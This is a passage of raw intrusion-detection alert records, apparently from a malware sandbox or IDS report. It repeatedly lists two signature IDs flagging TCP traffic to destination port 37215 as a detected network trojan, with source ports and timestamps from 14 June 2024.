                SID:2835222
                Source Port:50348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978987
                SID:2829579
                Source Port:34128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761325
                SID:2835222
                Source Port:58804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676065
                SID:2835222
                Source Port:45454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111764
                SID:2829579
                Source Port:44342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226430
                SID:2829579
                Source Port:60306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564443
                SID:2829579
                Source Port:53568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.336747
                SID:2829579
                Source Port:48832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.045461
                SID:2835222
                Source Port:38660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999411
                SID:2835222
                Source Port:49692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943929
                SID:2835222
                Source Port:53468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732701
                SID:2829579
                Source Port:38640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.687300
                SID:2835222
                Source Port:40960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451059
                SID:2829579
                Source Port:36890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323813
                SID:2835222
                Source Port:36072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014361
                SID:2829579
                Source Port:46338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.521632
                SID:2829579
                Source Port:54684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018820
                SID:2835222
                Source Port:32812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131076
                SID:2835222
                Source Port:44376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846376
                SID:2835222
                Source Port:40172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502904
                SID:2835222
                Source Port:46244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831280
                SID:2835222
                Source Port:36712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150486
                SID:2829579
                Source Port:34378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023201
                SID:2829579
                Source Port:52554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862125
                SID:2829579
                Source Port:37274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055793
                SID:2829579
                Source Port:45846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717357
                SID:2835222
                Source Port:57386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520707
                SID:2835222
                Source Port:48030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384174
                SID:2829579
                Source Port:33466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.988874
                SID:2835222
                Source Port:58154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662165
                SID:2835222
                Source Port:35624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643167
                SID:2835222
                Source Port:33566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660377
                SID:2829579
                Source Port:38568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564370
                SID:2835222
                Source Port:38198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365942
                SID:2829579
                Source Port:34994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717242
                SID:2835222
                Source Port:51834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861409
                SID:2829579
                Source Port:44036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149797
                SID:2829579
                Source Port:51116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705321
                SID:2829579
                Source Port:51866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915320
                SID:2829579
                Source Port:46936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.045796
                SID:2829579
                Source Port:55840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777360
                SID:2835222
                Source Port:50394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831577
                SID:2829579
                Source Port:36928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.569405
                SID:2835222
                Source Port:39040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025644
                SID:2829579
                Source Port:54886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151034
                SID:2829579
                Source Port:59482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367736
                SID:2835222
                Source Port:34948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383527
                SID:2829579
                Source Port:38960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.521517
                SID:2835222
                Source Port:37810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548655
                SID:2829579
                Source Port:58850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879047
                SID:2835222
                Source Port:44146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367289
                SID:2829579
                Source Port:32968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689090
                SID:2835222
                Source Port:34234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202086
                SID:2829579
                Source Port:52060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032721
                SID:2835222
                Source Port:42162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518560
                SID:2829579
                Source Port:46502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228382
                SID:2829579
                Source Port:44636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182577
                SID:2829579
                Source Port:51506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.027840
                SID:2829579
                Source Port:59522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181249
                SID:2835222
                Source Port:46260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880908
                SID:2835222
                Source Port:55012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151627
                SID:2829579
                Source Port:48784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243137
                SID:2835222
                Source Port:51884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071778
                SID:2835222
                Source Port:48612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471178
                SID:2829579
                Source Port:55532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668926
                SID:2835222
                Source Port:56720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669496
                SID:2829579
                Source Port:48536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185647
                SID:2835222
                Source Port:44562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229617
                SID:2835222
                Source Port:39892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369355
                SID:2829579
                Source Port:48042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253931
                SID:2829579
                Source Port:60966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341681
                SID:2835222
                Source Port:43520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340678
                SID:2829579
                Source Port:54366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.364733
                SID:2829579
                Source Port:53340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201232
                SID:2835222
                Source Port:36892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724062
                SID:2835222
                Source Port:45780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408940
                SID:2835222
                Source Port:50148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.613791
                SID:2835222
                Source Port:38376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726815
                SID:2829579
                Source Port:54008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969051
                SID:2835222
                Source Port:49530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072706
                SID:2835222
                Source Port:34466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.070397
                SID:2835222
                Source Port:56774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517822
                SID:2835222
                Source Port:54254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055453
                SID:2829579
                Source Port:58480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021552
                SID:2835222
                Source Port:58814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324591
                SID:2835222
                Source Port:56740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186053
                SID:2829579
                Source Port:42408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761584
                SID:2829579
                Source Port:48522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943571
                SID:2829579
                Source Port:45408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410588
                SID:2835222
                Source Port:55388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423328
                SID:2835222
                Source Port:48176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131289
                SID:2835222
                Source Port:57794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.161512
                SID:2829579
                Source Port:56034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978071
                SID:2835222
                Source Port:46108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453951
                SID:2835222
                Source Port:43740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325854
                SID:2829579
                Source Port:54898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671648
                SID:2835222
                Source Port:43228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324376
                SID:2829579
                Source Port:54534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025766
                SID:2835222
                Source Port:35308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.135029
                SID:2835222
                Source Port:58680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074585
                SID:2829579
                Source Port:33346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365354
                SID:2829579
                Source Port:40196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702843
                SID:2835222
                Source Port:55302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761506
                SID:2829579
                Source Port:44332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985821
                SID:2835222
                Source Port:48096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451841
                SID:2835222
                Source Port:52334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.970816
                SID:2829579
                Source Port:55180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225398
                SID:2829579
                Source Port:51102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879261
                SID:2835222
                Source Port:58236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160744
                SID:2829579
                Source Port:48360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012745
                SID:2829579
                Source Port:52386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812896
                SID:2829579
                Source Port:59830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789851
                SID:2835222
                Source Port:46120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766530
                SID:2835222
                Source Port:45878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.542286
                SID:2829579
                Source Port:36174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678337
                SID:2835222
                Source Port:42194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014780
                SID:2835222
                Source Port:59652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289025
                SID:2835222
                Source Port:51422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183285
                SID:2829579
                Source Port:35506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668440
                SID:2829579
                Source Port:55366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.178948
                SID:2835222
                Source Port:37106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804668
                SID:2835222
                Source Port:41778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.069044
                SID:2835222
                Source Port:44524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424695
                SID:2835222
                Source Port:39394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979505
                SID:2829579
                Source Port:35746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183084
                SID:2829579
                Source Port:60908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760781
                SID:2829579
                Source Port:60232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225534
                SID:2829579
                Source Port:55954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340216
                SID:2835222
                Source Port:50788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295432
                SID:2835222
                Source Port:38812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625202
                SID:2835222
                Source Port:45378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024123
                SID:2829579
                Source Port:46574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242806
                SID:2829579
                Source Port:54560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012502
                SID:2829579
                Source Port:46950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.716944
                SID:2835222
                Source Port:48574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759613
                SID:2829579
                Source Port:33634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718500
                SID:2829579
                Source Port:50214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074928
                SID:2835222
                Source Port:59050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545274
                SID:2835222
                Source Port:43126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.898324
                SID:2829579
                Source Port:34198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019009
                SID:2835222
                Source Port:51104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.719043
                SID:2835222
                Source Port:50452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323263
                SID:2835222
                Source Port:42320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703993
                SID:2829579
                Source Port:46604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411996
                SID:2829579
                Source Port:43468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943850
                SID:2835222
                Source Port:37800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677803
                SID:2835222
                Source Port:43130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324203
                SID:2829579
                Source Port:36734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020942
                SID:2829579
                Source Port:50616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.337246
                SID:2829579
                Source Port:33598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.078752
                SID:2829579
                Source Port:49632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789478
                SID:2829579
                Source Port:58918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762916
                SID:2829579
                Source Port:35510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421792
                SID:2835222
                Source Port:54484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159874
                SID:2835222
                Source Port:39334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813199
                SID:2829579
                Source Port:44180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201458
                SID:2829579
                Source Port:54964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670685
                SID:2829579
                Source Port:54202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.089792
                SID:2835222
                Source Port:55686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882169
                SID:2835222
                Source Port:53044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228515
                SID:2829579
                Source Port:35130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.448727
                SID:2829579
                Source Port:50978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253694
                SID:2835222
                Source Port:37836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407245
                SID:2835222
                Source Port:56736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763601
                SID:2835222
                Source Port:48020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149362
                SID:2829579
                Source Port:36998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618453
                SID:2835222
                Source Port:47488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.250697
                SID:2829579
                Source Port:55370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661427
                SID:2835222
                Source Port:35988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384973
                SID:2835222
                Source Port:38544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670590
                SID:2835222
                Source Port:40616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242032
                SID:2835222
                Source Port:50324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942742
                SID:2835222
                Source Port:53714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807575
                SID:2835222
                Source Port:34768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143601
                SID:2835222
                Source Port:54030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985345
                SID:2835222
                Source Port:48118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986276
                SID:2835222
                Source Port:59612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761921
                SID:2829579
                Source Port:50892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546904
                SID:2835222
                Source Port:46082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293638
                SID:2829579
                Source Port:35188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861191
                SID:2835222
                Source Port:52392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792440
                SID:2835222
                Source Port:39598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906035
                SID:2829579
                Source Port:37032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.288660
                SID:2835222
                Source Port:49534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017009
                SID:2829579
                Source Port:60600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704326
                SID:2835222
                Source Port:51792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683026
                SID:2835222
                Source Port:45192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567207
                SID:2829579
                Source Port:38746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812665
                SID:2835222
                Source Port:35978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.083757
                SID:2835222
                Source Port:57590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277824
                SID:2835222
                Source Port:38564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.082575
                SID:2835222
                Source Port:41170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941702
                SID:2829579
                Source Port:39434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616630
                SID:2835222
                Source Port:45174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411917
                SID:2835222
                Source Port:36384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914195
                SID:2829579
                Source Port:53680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808128
                SID:2835222
                Source Port:34600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790923
                SID:2829579
                Source Port:46038
                Destination Port:37215
